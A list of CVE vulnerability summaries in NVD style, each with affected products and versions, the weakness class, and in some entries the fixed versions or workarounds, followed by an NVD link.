CVE-2021-43142 An XML External Entity (XXE) vulnerability exists in wuta jox 1.16 in the readObject method in JOXSAXBeanInput. https://nvd.nist.gov/vuln/detail/CVE-2021-43142
CVE-2021-45900 Vivoh Webinar Manager before 3.6.3.0 has improper API authentication. When a user logs in to the administration configuration web portlet, a VIVOH_AUTH cookie is assigned so that they can be uniquely identified. Certain APIs can be successfully executed without proper authentication. This can let an attacker impersonate as victim and make state changing requests on their behalf. https://nvd.nist.gov/vuln/detail/CVE-2021-45900
CVE-2022-24790 Puma is a simple, fast, multi-threaded, parallel HTTP 1.1 server for Ruby/Rack applications. When using Puma behind a proxy that does not properly validate that the incoming HTTP request matches the RFC7230 standard, Puma and the frontend proxy may disagree on where a request starts and ends. This would allow requests to be smuggled via the front-end proxy to Puma. The vulnerability has been fixed in 5.6.4 and 4.3.12. Users are advised to upgrade as soon as possible. Workaround: when deploying a proxy in front of Puma, turning on any and all functionality to make sure that the request matches the RFC7230 standard. https://nvd.nist.gov/vuln/detail/CVE-2022-24790
CVE-2021-33523 MashZone NextGen through 10.7 GA allows a remote authenticated user, with access to the admin console, to upload a new JDBC driver that can execute arbitrary commands on the underlying host. This occurs in com.idsscheer.ppmmashup.business.jdbc.DriverUploadController. https://nvd.nist.gov/vuln/detail/CVE-2021-33523
CVE-2021-20729 Cross-site scripting vulnerability in pfSense CE and pfSense Plus (pfSense CE software versions 2.5.2 and earlier, and pfSense Plus software versions 21.05 and earlier) allows a remote attacker to inject an arbitrary script via a malicious URL. https://nvd.nist.gov/vuln/detail/CVE-2021-20729
CVE-2022-22986 Netcommunity OG410X and OG810X series (Netcommunity OG410Xa, OG410Xi, OG810Xa, and OG810Xi firmware Ver.2.28 and earlier) allow an attacker on the adjacent network to execute an arbitrary OS command via a specially crafted config file. https://nvd.nist.gov/vuln/detail/CVE-2022-22986
CVE-2022-23183 Missing authorization vulnerability in Advanced Custom Fields versions prior to 5.12.1 and Advanced Custom Fields Pro versions prior to 5.12.1 allows a remote authenticated attacker to view the information on the database without the access permission. https://nvd.nist.gov/vuln/detail/CVE-2022-23183
CVE-2022-24299 Improper input validation vulnerability in pfSense CE and pfSense Plus (pfSense CE software versions prior to 2.6.0 and pfSense Plus software versions prior to 22.01) allows a remote attacker with the privilege to change OpenVPN client or server settings to execute an arbitrary command. https://nvd.nist.gov/vuln/detail/CVE-2022-24299
CVE-2022-25348 Untrusted search path vulnerability in AttacheCase ver.4.0.2.7 and earlier allows an attacker to gain privileges and execute arbitrary code via a Trojan horse DLL in an unspecified directory. https://nvd.nist.gov/vuln/detail/CVE-2022-25348
CVE-2022-26019 Improper access control vulnerability in pfSense CE and pfSense Plus (pfSense CE software versions prior to 2.6.0 and pfSense Plus software versions prior to 22.01) allows a remote attacker with the privilege to change NTP GPS settings to rewrite existing files on the file system, which may result in arbitrary command execution. https://nvd.nist.gov/vuln/detail/CVE-2022-26019
CVE-2022-27496 Cross-site scripting vulnerability in Zero-channel BBS Plus v0.7.4 and earlier allows a remote attacker to inject an arbitrary script via unspecified vectors. https://nvd.nist.gov/vuln/detail/CVE-2022-27496
CVE-2022-28128 Untrusted search path vulnerability in AttacheCase ver.3.6.1.0 and earlier allows an attacker to gain privileges and execute arbitrary code via a Trojan horse DLL in an unspecified directory. https://nvd.nist.gov/vuln/detail/CVE-2022-28128
CVE-2022-1191 SSRF on index.php/cobrowse/proxycss/ in GitHub repository livehelperchat/livehelperchat prior to 3.96. https://nvd.nist.gov/vuln/detail/CVE-2022-1191
CVE-2022-25915 Improper access control vulnerability in ELECOM LAN routers (WRC-1167GST2 firmware v1.25 and prior, WRC-1167GST2A firmware v1.25 and prior, WRC-1167GST2H firmware v1.25 and prior, WRC-2533GS2-B firmware v1.52 and prior, WRC-2533GS2-W firmware v1.52 and prior, WRC-1750GS firmware v1.03 and prior, WRC-1750GSV firmware v2.11 and prior, WRC-1900GST firmware v1.03 and prior, WRC-2533GST firmware v1.03 and prior, WRC-2533GSTA firmware v1.03 and prior, WRC-2533GST2 firmware v1.25 and prior, WRC-2533GST2SP firmware v1.25 and prior, WRC-2533GST2-G firmware v1.25 and prior, and EDWRC-2533GST2 firmware v1.25 and prior) allows a network-adjacent authenticated attacker to bypass access restriction and to access the management screen of the product via unspecified vectors. https://nvd.nist.gov/vuln/detail/CVE-2022-25915
CVE-2022-1176 Loose comparison causes IDOR on multiple endpoints in GitHub repository livehelperchat/livehelperchat prior to 3.96. https://nvd.nist.gov/vuln/detail/CVE-2022-1176
CVE-2022-24136 Hospital Management System v1.0 is affected by an unrestricted upload of dangerous file type vulerability in treatmentrecord.php. To exploit, an attacker can upload any PHP file, and then execute it. https://nvd.nist.gov/vuln/detail/CVE-2022-24136
CVE-2021-34257 Multiple Remote Code Execution (RCE) vulnerabilities exist in WPanel 4 4.3.1 and below via a malicious PHP file upload to (1) Dashboard's Avatar image, (2) Posts Folder image, (3) Pages Folder image and (4) Gallery Folder image. https://nvd.nist.gov/vuln/detail/CVE-2021-34257
CVE-2022-0350 Cross-site Scripting (XSS) - Stored in GitHub repository vanessa219/vditor prior to 3.8.13. https://nvd.nist.gov/vuln/detail/CVE-2022-0350
CVE-2021-43505 Multiple Cross Site Scripting (XSS) vulnerabilities exist in Ssourcecodester Simple Client Management System v1 via (1) Add new Client and (2) Add new invoice. https://nvd.nist.gov/vuln/detail/CVE-2021-43505
CVE-2021-43506 An SQL Injection vulnerability exists in Sourcecodester Simple Client Management System 1.0 via the password parameter in Login.php. https://nvd.nist.gov/vuln/detail/CVE-2021-43506
CVE-2021-36625 An SQL Injection vulnerability exists in Dolibarr ERP/CRM 13.0.2 (fixed version is 14.0.0) via a POST request to the country_id parameter in an UPDATE statement. https://nvd.nist.gov/vuln/detail/CVE-2021-36625
CVE-2021-42866 A Cross Site Scripting vulnerabilty exists in Pixelimity 1.0 via the Site Description field in pixelimity/admin/setting.php https://nvd.nist.gov/vuln/detail/CVE-2021-42866
CVE-2021-42867 A Cross Site Scripting (XSS) vulnerability exists in DanPros htmly 2.8.1 via the Description field in (1) admin/config, and (2) index.php pages. https://nvd.nist.gov/vuln/detail/CVE-2021-42867
CVE-2021-42868 A Cross Site Scripting (XSS) vulnerability exists in Chikista Patient Management Software 2.0.2 in the first_name parameter in (1) patient/insert, (2) patient_report, (3) appointment_report, (4) visit_report, and (5) bill_detail_report pages. . https://nvd.nist.gov/vuln/detail/CVE-2021-42868
CVE-2021-42869 A Cross Site Scripting (XSS) vulnerability exists in Chikista Patient Management Software 2.0.2 via the last_name parameter in the (1) patient/insert, (2) patient_report, (3) /appointment_report, (4) visit_report, and (5) /bill_detail_report pages. https://nvd.nist.gov/vuln/detail/CVE-2021-42869
CVE-2021-42946 A Cross Site Scripting (XSS) vulnerability exists in htmly.2.8.1 via the Copyright field in the /admin/config page. https://nvd.nist.gov/vuln/detail/CVE-2021-42946
CVE-2022-22311 IBM Security Verify Access could allow a user, using man in the middle techniques, to obtain sensitive information or possibly change some information due to improper validiation of JWT tokens. https://nvd.nist.gov/vuln/detail/CVE-2022-22311
CVE-2021-37517 An Access Control vulnerability exists in Dolibarr ERP/CRM 13.0.2, fixed version is 14.0.0,in the forgot-password function becuase the application allows email addresses as usernames, which can cause a Denial of Service. https://nvd.nist.gov/vuln/detail/CVE-2021-37517
CVE-2021-43478 A vulnerability exists in Hoosk 1.8.0 in /install/index.php, due to a failure to check if config.php already exists in the root directory, which could let a malicious user reinstall the website. https://nvd.nist.gov/vuln/detail/CVE-2021-43478
CVE-2021-43484 A Remote Code Execution (RCE) vulnerability exists in Simple Client Management System 1.0 in create.php due to the failure to validate the extension of the file being sent in a request. https://nvd.nist.gov/vuln/detail/CVE-2021-43484
CVE-2021-43479 A Remote Code Execution (RCE) vulnerability exists in The-Secretary 2.5 via install.php. https://nvd.nist.gov/vuln/detail/CVE-2021-43479
CVE-2021-43707 Cross Site Scripting (XSS) vulnerability exists in Maccms v10 via link_Name parameter. https://nvd.nist.gov/vuln/detail/CVE-2021-43707
CVE-2021-43722 D-Link DIR-645 1.03 A1 is vulnerable to Buffer Overflow. The hnap_main function in the cgibin handler uses sprintf to format the soapaction header onto the stack and has no limit on the size. https://nvd.nist.gov/vuln/detail/CVE-2021-43722
CVE-2022-26546 Hospital Management System v1.0 was discovered to lack an authorization component, allowing attackers to access sensitive information and obtain the admin password. https://nvd.nist.gov/vuln/detail/CVE-2022-26546
CVE-2022-24758 The Jupyter notebook is a web-based notebook environment for interactive computing. Prior to version 6.4.9, unauthorized actors can access sensitive information from server logs. Anytime a 5xx error is triggered, the auth cookie and other header values are recorded in Jupyter server logs by default. Considering these logs do not require root access, an attacker can monitor these logs, steal sensitive auth/cookie information, and gain access to the Jupyter server. Jupyter notebook version 6.4.x contains a patch for this issue. There are currently no known workarounds. https://nvd.nist.gov/vuln/detail/CVE-2022-24758
CVE-2022-24791 Wasmtime is a standalone JIT-style runtime for WebAssembly, using Cranelift. There is a use after free vulnerability in Wasmtime when both running Wasm that uses externrefs and enabling epoch interruption in Wasmtime. If you are not explicitly enabling epoch interruption (it is disabled by default) then you are not affected. If you are explicitly disabling the Wasm reference types proposal (it is enabled by default) then you are also not affected. The use after free is caused by Cranelift failing to emit stack maps when there are safepoints inside cold blocks. Cold blocks occur when epoch interruption is enabled. Cold blocks are emitted at the end of compiled functions, and change the order blocks are emitted versus defined. This reordering accidentally caused Cranelift to skip emitting some stack maps because it expected to emit the stack maps in block definition order, rather than block emission order. When Wasmtime would eventually collect garbage, it would fail to find live references on the stack because of the missing stack maps, think that they were unreferenced garbage, and therefore reclaim them. Then after the collection ended, the Wasm code could use the reclaimed-too-early references, which is a use after free. Patches have been released in versions 0.34.2 and 0.35.2, which fix the vulnerability. All Wasmtime users are recommended to upgrade to these patched versions. If upgrading is not an option for you at this time, you can avoid the vulnerability by either: disabling the Wasm reference types proposal, config.wasm_reference_types(false); or by disabling epoch interruption if you were previously enabling it. config.epoch_interruption(false). https://nvd.nist.gov/vuln/detail/CVE-2022-24791
CVE-2022-24794 Express OpenID Connect is an Express JS middleware implementing sign on for Express web apps using OpenID Connect. Users of the `requiresAuth` middleware, either directly or through the default `authRequired` option, are vulnerable to an Open Redirect when the middleware is applied to a catch all route. If all routes under `example.com` are protected with the `requiresAuth` middleware, a visit to `http://example.com//google.com` will be redirected to `google.com` after login because the original url reported by the Express framework is not properly sanitized. This vulnerability affects versions prior to 2.7.2. Users are advised to upgrade. There are no known workarounds. https://nvd.nist.gov/vuln/detail/CVE-2022-24794
CVE-2022-24796 RaspberryMatic is a free and open-source operating system for running a cloud-free smart-home using the homematicIP / HomeMatic hardware line of IoT devices. A Remote Code Execution (RCE) vulnerability in the file upload facility of the WebUI interface of RaspberryMatic exists. Missing input validation/sanitization in the file upload mechanism allows remote, unauthenticated attackers with network access to the WebUI interface to achieve arbitrary operating system command execution via shell metacharacters in the HTTP query string. Injected commands are executed as root, thus leading to a full compromise of the underlying system and all its components. Versions after `2.31.25.20180428` and prior to `3.63.8.20220330` are affected. Users are advised to update to version `3.63.8.20220330` or newer. There are currently no known workarounds to mitigate the security impact and users are advised to update to the latest version available. https://nvd.nist.gov/vuln/detail/CVE-2022-24796
CVE-2022-24797 Pomerium is an identity-aware access proxy. In distributed service mode, Pomerium's Authenticate service exposes pprof debug and prometheus metrics handlers to untrusted traffic. This can leak potentially sensitive environmental information or lead to limited denial of service conditions. This issue is patched in version v0.17.1 Workarounds: Block access to `/debug` and `/metrics` paths on the authenticate service. This can be done with any L7 proxy, including Pomerium's own proxy service. https://nvd.nist.gov/vuln/detail/CVE-2022-24797
CVE-2022-24798 Internet Routing Registry daemon version 4 is an IRR database server, processing IRR objects in the RPSL format. IRRd did not always filter password hashes in query responses relating to `mntner` objects and database exports. This may have allowed adversaries to retrieve some of these hashes, perform a brute-force search for the clear-text passphrase, and use these to make unauthorised changes to affected IRR objects. This issue only affected instances that process password hashes, which means it is limited to IRRd instances that serve authoritative databases. IRRd instances operating solely as mirrors of other IRR databases are not affected. This has been fixed in IRRd 4.2.3 and the main branch. Versions in the 4.1.x series never were affected. Users of the 4.2.x series are strongly recommended to upgrade. There are no known workarounds for this issue. https://nvd.nist.gov/vuln/detail/CVE-2022-24798
CVE-2022-27049 Raidrive before v2021.12.35 allows attackers to arbitrarily move log files by pre-creating a mountpoint and log files before Raidrive is installed. https://nvd.nist.gov/vuln/detail/CVE-2022-27049
CVE-2022-27050 BitComet Service for Windows before version 1.8.6 contains an unquoted service path vulnerability which allows attackers to escalate privileges to the system level. https://nvd.nist.gov/vuln/detail/CVE-2022-27050
CVE-2022-27052 FreeFtpd version 1.0.13 and below contains an unquoted service path vulnerability which allows local users to launch processes with elevated privileges. https://nvd.nist.gov/vuln/detail/CVE-2022-27052
CVE-2022-27963 Xftp 7.0.0088p and below contains a binary hijack vulnerability which allows attackers to execute arbitrary code via a crafted .exe file. https://nvd.nist.gov/vuln/detail/CVE-2022-27963
CVE-2022-27964 Xmanager v7.0.0096 and below contains a binary hijack vulnerability which allows attackers to execute arbitrary code via a crafted .exe file. https://nvd.nist.gov/vuln/detail/CVE-2022-27964
CVE-2022-27965 Xlpd v7.0.0094 and below contains a binary hijack vulnerability which allows attackers to execute arbitrary code via a crafted .exe file. https://nvd.nist.gov/vuln/detail/CVE-2022-27965
CVE-2022-27966 Xshell v7.0.0099 and below contains a binary hijack vulnerability which allows attackers to execute arbitrary code via a crafted .exe file. https://nvd.nist.gov/vuln/detail/CVE-2022-27966
CVE-2022-24802 deepmerge-ts is a typescript library providing functionality to deep merging of javascript objects. deepmerge-ts is vulnerable to Prototype Pollution via file deepmerge.ts, function defaultMergeRecords(). This issue has been patched in version 4.0.2. There are no known workarounds for this issue. https://nvd.nist.gov/vuln/detail/CVE-2022-24802
CVE-2022-24803 Asciidoctor-include-ext is Asciidoctor’s standard include processor reimplemented as an extension. Versions prior to 0.4.0, when used to render user-supplied input in AsciiDoc markup, may allow an attacker to execute arbitrary system commands on the host operating system. This attack is possible even when `allow-uri-read` is disabled! The problem has been patched in the referenced commits. https://nvd.nist.gov/vuln/detail/CVE-2022-24803
CVE-2021-1942 Improper handling of permissions of a shared memory region can lead to memory corruption in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking https://nvd.nist.gov/vuln/detail/CVE-2021-1942
CVE-2021-1950 Improper cleaning of secure memory between authenticated users can lead to face authentication bypass in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wired Infrastructure and Networking https://nvd.nist.gov/vuln/detail/CVE-2021-1950
CVE-2021-30328 Possible assertion due to improper validation of invalid NR CSI-IM resource configuration in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile https://nvd.nist.gov/vuln/detail/CVE-2021-30328
CVE-2021-30329 Possible assertion due to improper validation of TCI configuration in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile https://nvd.nist.gov/vuln/detail/CVE-2021-30329
CVE-2021-30331 Possible buffer overflow due to improper data validation of external commands sent via DIAG interface in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables https://nvd.nist.gov/vuln/detail/CVE-2021-30331
CVE-2021-30332 Possible assertion due to improper validation of OTA configuration in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile https://nvd.nist.gov/vuln/detail/CVE-2021-30332
CVE-2021-30333 Improper validation of buffer size input to the EFS file can lead to memory corruption in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables https://nvd.nist.gov/vuln/detail/CVE-2021-30333
CVE-2021-35088 Possible out of bound read due to improper validation of IE length during SSID IE parse when channel is DFS in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking https://nvd.nist.gov/vuln/detail/CVE-2021-35088
CVE-2021-35089 Possible buffer overflow due to lack of input IB amount validation while processing the user command in Snapdragon Auto https://nvd.nist.gov/vuln/detail/CVE-2021-35089
CVE-2021-35103 Possible out of bound write due to improper validation of number of timer values received from firmware while syncing timers in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking https://nvd.nist.gov/vuln/detail/CVE-2021-35103
CVE-2021-35105 Possible out of bounds access due to improper input validation during graphics profiling in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables https://nvd.nist.gov/vuln/detail/CVE-2021-35105
CVE-2021-35106 Possible out of bound read due to improper length calculation of WMI message. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables https://nvd.nist.gov/vuln/detail/CVE-2021-35106
CVE-2021-35110 Possible buffer overflow to improper validation of hash segment of file while allocating memory in Snapdragon Connectivity, Snapdragon Mobile https://nvd.nist.gov/vuln/detail/CVE-2021-35110
CVE-2021-35115 Improper handling of multiple session supported by PVM backend can lead to use after free in Snapdragon Auto, Snapdragon Mobile https://nvd.nist.gov/vuln/detail/CVE-2021-35115
CVE-2021-35117 An Out of Bounds read may potentially occur while processing an IBSS beacon, in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music https://nvd.nist.gov/vuln/detail/CVE-2021-35117
CVE-2022-25017 Hitron CHITA 7.2.2.0.3b6-CD devices contain a command injection vulnerability via the Device/DDNS ddnsUsername field. https://nvd.nist.gov/vuln/detail/CVE-2022-25017
CVE-2022-21947 A Improper Access Control vulnerability in Rancher Desktop of SUSE allows attackers in the local network to connect to the Dashboard API (steve) to carry out arbitrary actions. This issue affects: SUSE Rancher Desktop versions prior to V. https://nvd.nist.gov/vuln/detail/CVE-2022-21947
CVE-2022-24181 Cross-site scripting (XSS) via Host Header injection in PKP Open Journals System 2.4.8 >= 3.3 allows remote attackers to inject arbitary code via the X-Forwarded-Host Header. https://nvd.nist.gov/vuln/detail/CVE-2022-24181
CVE-2021-44135 pagekit all versions, as of 15-10-2021, is vulnerable to SQL Injection via Comment listing. https://nvd.nist.gov/vuln/detail/CVE-2021-44135
CVE-2022-21235 The package github.com/masterminds/vcs before 1.13.3 are vulnerable to Command Injection via argument injection. When hg is executed, argument strings are passed to hg in a way that additional flags can be set. The additional flags can be used to perform a command injection. https://nvd.nist.gov/vuln/detail/CVE-2022-21235
CVE-2022-22327 IBM UrbanCode Deploy (UCD) 7.0.5, 7.1.0, 7.1.1, and 7.1.2 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 218859. https://nvd.nist.gov/vuln/detail/CVE-2022-22327
CVE-2022-22328 IBM SterlingPartner Engagement Manager 6.2.0 could allow a malicious user to elevate their privileges and perform unintended operations to another users data. IBM X-Force ID: 218871. https://nvd.nist.gov/vuln/detail/CVE-2022-22328
CVE-2022-22331 IBM SterlingPartner Engagement Manager 6.2.0 could allow a remote authenticated attacker to obtain sensitive information or modify user details caused by an insecure direct object vulnerability (IDOR). IBM X-Force ID: 219130. https://nvd.nist.gov/vuln/detail/CVE-2022-22331
CVE-2022-22332 IBM Sterling Partner Engagement Manager 6.2.0 could allow an attacker to impersonate another user due to missing revocation mechanism for the JWT token. IBM X-Force ID: 219131. https://nvd.nist.gov/vuln/detail/CVE-2022-22332
CVE-2022-22404 IBM App Connect Enterprise Certified Container Dashboard UI (IBM App Connect Enterprise Certified Container 1.5, 2.0, 2.1, 3.0, and 3.1) may be vulnerable to denial of service due to excessive rate limiting. https://nvd.nist.gov/vuln/detail/CVE-2022-22404
CVE-2022-21223 The package cocoapods-downloader before 1.6.2 are vulnerable to Command Injection via hg argument injection. When calling the download function (when using hg), the url (and/or revision, tag, branch) is passed to the hg clone command in a way that additional flags can be set. The additional flags can be used to perform a command injection. https://nvd.nist.gov/vuln/detail/CVE-2022-21223
CVE-2022-24440 The package cocoapods-downloader before 1.6.0, from 1.6.2 and before 1.6.3 are vulnerable to Command Injection via git argument injection. When calling the Pod::Downloader.preprocess_options function and using git, both the git and branch parameters are passed to the git ls-remote subcommand in a way that additional flags can be set. The additional flags can be used to perform a command injection. https://nvd.nist.gov/vuln/detail/CVE-2022-24440
CVE-2022-1207 Out-of-bounds read in GitHub repository radareorg/radare2 prior to 5.6.8. This vulnerability allows attackers to read sensitive information from outside the allocated buffer boundary. https://nvd.nist.gov/vuln/detail/CVE-2022-1207
CVE-2022-23155 Dell Wyse Management Suite versions 2.0 through 3.5.2 contain an unrestricted file upload vulnerability. A malicious user with admin privileges can exploit this vulnerability in order to execute arbitrary code on the system. https://nvd.nist.gov/vuln/detail/CVE-2022-23155
CVE-2022-23156 Wyse Device Agent version 14.6.1.4 and below contain an Improper Authentication vulnerability. A malicious user could potentially exploit this vulnerability by providing invalid input in order to obtain a connection to WMS server. https://nvd.nist.gov/vuln/detail/CVE-2022-23156
CVE-2022-23157 Wyse Device Agent version 14.6.1.4 and below contain a sensitive data exposure vulnerability. A authenticated malicious user could potentially exploit this vulnerability in order to view sensitive information from the WMS Server. https://nvd.nist.gov/vuln/detail/CVE-2022-23157
CVE-2022-23158 Wyse Device Agent version 14.6.1.4 and below contain a sensitive data exposure vulnerability. A local authenticated user with standard privilege could potentially exploit this vulnerability and provide incorrect port information and get connected to valid WMS server https://nvd.nist.gov/vuln/detail/CVE-2022-23158
CVE-2022-24066 The package simple-git before 3.5.0 are vulnerable to Command Injection due to an incomplete fix of [CVE-2022-24433](https://security.snyk.io/vuln/SNYK-JS-SIMPLEGIT-2421199) which only patches against the git fetch attack vector. A similar use of the --upload-pack feature of git is also supported for git clone, which the prior fix didn't cover. https://nvd.nist.gov/vuln/detail/CVE-2022-24066
CVE-2022-24426 Dell Command | Update, Dell Update, and Alienware Update versions prior to 4.5 contain a Local Privilege Escalation Vulnerability in the Advanced Driver Restore component. A local malicious user could potentially exploit this vulnerability, leading to privilege escalation. https://nvd.nist.gov/vuln/detail/CVE-2022-24426
CVE-2022-26562 An issue in provider/libserver/ECKrbAuth.cpp of Kopano-Core v11.0.2.51 contains an issue which allows attackers to authenticate even if the user account or password is expired. https://nvd.nist.gov/vuln/detail/CVE-2022-26562
CVE-2022-26565 A cross-site scripting (XSS) vulnerability in Totaljs commit 95f54a5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Page Name text field when creating a new page. https://nvd.nist.gov/vuln/detail/CVE-2022-26565
CVE-2019-14839 It was observed that while login into Business-central console, HTTP request discloses sensitive information like username and password when intercepted using some tool like burp suite etc. https://nvd.nist.gov/vuln/detail/CVE-2019-14839
CVE-2020-14479 Sensitive information can be obtained through the handling of serialized data. The issue results from the lack of proper authentication required to query the server https://nvd.nist.gov/vuln/detail/CVE-2020-14479
CVE-2020-25691 A flaw was found in darkhttpd. Invalid error handling allows remote attackers to cause denial-of-service by accessing a file with a large modification date. The highest threat from this vulnerability is to system availability. https://nvd.nist.gov/vuln/detail/CVE-2020-25691
CVE-2021-20238 It was found in OpenShift Container Platform 4 that ignition config, served by the Machine Config Server, can be accessed externally from clusters without authentication. The MCS endpoint (port 22623) provides ignition configuration used for bootstrapping Nodes and can include some sensitive data, e.g. registry pull secrets. There are two scenarios where this data can be accessed. The first is on Baremetal, OpenStack, Ovirt, Vsphere and KubeVirt deployments which do not have a separate internal API endpoint and allow access from outside the cluster to port 22623 from the standard OpenShift API Virtual IP address. The second is on cloud deployments when using unsupported network plugins, which do not create iptables rules that prevent to port 22623. In this scenario, the ignition config is exposed to all pods within the cluster and cannot be accessed externally. https://nvd.nist.gov/vuln/detail/CVE-2021-20238
CVE-2021-20295 It was discovered that the update for the virt:rhel module in the RHSA-2020:4676 (https://access.redhat.com/errata/RHSA-2020:4676) erratum released as part of Red Hat Enterprise Linux 8.3 failed to include the fix for the qemu-kvm component issue CVE-2020-10756, which was previously corrected in virt:rhel/qemu-kvm via erratum RHSA-2020:4059 (https://access.redhat.com/errata/RHSA-2020:4059). CVE-2021-20295 was assigned to that Red Hat specific security regression. For more details about the original security issue CVE-2020-10756, refer to bug 1835986 or the CVE page: https://access.redhat.com/security/cve/CVE-2020-10756. https://nvd.nist.gov/vuln/detail/CVE-2021-20295
CVE-2021-22277 Improper Input Validation vulnerability in ABB 800xA, Control Software for AC 800M, Control Builder Safe, Compact Product Suite - Control and I/O, ABB Base Software for SoftControl allows an attacker to cause the denial of service. https://nvd.nist.gov/vuln/detail/CVE-2021-22277
CVE-2021-23247 A command injection vulerability found in quick game engine allows arbitrary remote code in quick app. Allows remote attacke0rs to gain arbitrary code execution in quick game engine https://nvd.nist.gov/vuln/detail/CVE-2021-23247
CVE-2021-23287 The vulnerability exists due to insufficient validation of input of certain resources within the IPM software. This issue affects: Intelligent Power Manager (IPM 1) versions prior to 1.70. https://nvd.nist.gov/vuln/detail/CVE-2021-23287
CVE-2021-23288 The vulnerability exists due to insufficient validation of input from certain resources by the IPP software. The attacker would need access to the local Subnet and an administrator interaction to compromise the system. This issue affects: Intelligent Power Protector versions prior to 1.69. https://nvd.nist.gov/vuln/detail/CVE-2021-23288
CVE-2021-26623 A remote code execution vulnerability due to incomplete check for 'xheader_decode_path_record' function's parameter length value in the ark library. Remote attackers can induce exploit malicious code using this function. https://nvd.nist.gov/vuln/detail/CVE-2021-26623
CVE-2021-26624 An local privilege escalation vulnerability due to a "runasroot" command in eScan Anti-Virus. This vulnerability is due to invalid arguments and insufficient execution conditions related to "runasroot" command. This vulnerability can induce remote attackers to exploit root privileges by manipulating parameter values. https://nvd.nist.gov/vuln/detail/CVE-2021-26624
CVE-2021-27223 A denial-of-service issue existed in one of modules that was incorporated in Kaspersky Anti-Virus products for home and Kaspersky Endpoint Security. A local user could cause Windows crash by running a specially crafted binary module. The fix was delivered automatically. Credits: (Straghkov Denis, Kurmangaleev Shamil, Fedotov Andrey, Kuts Daniil, Mishechkin Maxim, Akolzin Vitaliy) @ ISPRAS https://nvd.nist.gov/vuln/detail/CVE-2021-27223
CVE-2021-27493 Philips Vue PACS versions 12.2.x.x and prior does not ensure or incorrectly ensures structured messages or data are well formed and that certain security properties are met before being read from an upstream component or sent to a downstream component. https://nvd.nist.gov/vuln/detail/CVE-2021-27493
CVE-2021-27497 Philips Vue PACS versions 12.2.x.x and prior does not use or incorrectly uses a protection mechanism that provides sufficient defense against directed attacks against the product. https://nvd.nist.gov/vuln/detail/CVE-2021-27497
CVE-2021-27501 Philips Vue PACS versions 12.2.x.x and prior does not follow certain coding rules for development, which can lead to resultant weaknesses or increase the severity of the associated vulnerabilities. https://nvd.nist.gov/vuln/detail/CVE-2021-27501
CVE-2021-28504 On Arista Strata family products which have “TCAM profile” feature enabled when Port IPv4 access-list has a rule which matches on “vxlan” as protocol then that rule and subsequent rules ( rules declared after it in ACL ) do not match on IP protocol field as expected. https://nvd.nist.gov/vuln/detail/CVE-2021-28504
CVE-2021-32503 Unauthenticated users can access sensitive web URLs through GET request, which should be restricted to maintenance users only. A malicious attacker could use this sensitive information’s to launch further attacks on the system. https://nvd.nist.gov/vuln/detail/CVE-2021-32503
CVE-2021-32933 An attacker could leverage an API to pass along a malicious file that could then manipulate the process creation command line in MDT AutoSave versions prior to v6.02.06 and run a command line argument. This could then be leveraged to run a malicious process. https://nvd.nist.gov/vuln/detail/CVE-2021-32933
CVE-2021-32937 An attacker can gain knowledge of a session temporary working folder where the getfile and putfile commands are used in MDT AutoSave versions prior to v6.02.06. An attacker can leverage this knowledge to provide a malicious command to the working directory where the read and write activity can be initiated. https://nvd.nist.gov/vuln/detail/CVE-2021-32937
CVE-2021-32945 An attacker could decipher the encryption and gain access to MDT AutoSave versions prior to v6.02.06. https://nvd.nist.gov/vuln/detail/CVE-2021-32945
CVE-2021-32949 An attacker could utilize a function in MDT AutoSave versions prior to v6.02.06 that permits changing a designated path to another path and traversing the directory, allowing the replacement of an existing file with a malicious file. https://nvd.nist.gov/vuln/detail/CVE-2021-32949
CVE-2021-32953 An attacker could utilize SQL commands to create a new user MDT AutoSave versions prior to v6.02.06 and update the user’s permissions, granting the attacker the ability to login. https://nvd.nist.gov/vuln/detail/CVE-2021-32953
CVE-2021-32957 A function in MDT AutoSave versions prior to v6.02.06 is used to retrieve system information for a specific process, and this information collection executes multiple commands and summarizes the information into an XML. This function and subsequent process gives full path to the executable and is therefore vulnerable to binary hijacking. https://nvd.nist.gov/vuln/detail/CVE-2021-32957
CVE-2021-32960 Rockwell Automation FactoryTalk Services Platform v6.11 and earlier, if FactoryTalk Security is enabled and deployed contains a vulnerability that may allow a remote, authenticated attacker to bypass FactoryTalk Security policies based on the computer name. If successfully exploited, this may allow an attacker to have the same privileges as if they were logged on to the client machine. https://nvd.nist.gov/vuln/detail/CVE-2021-32960
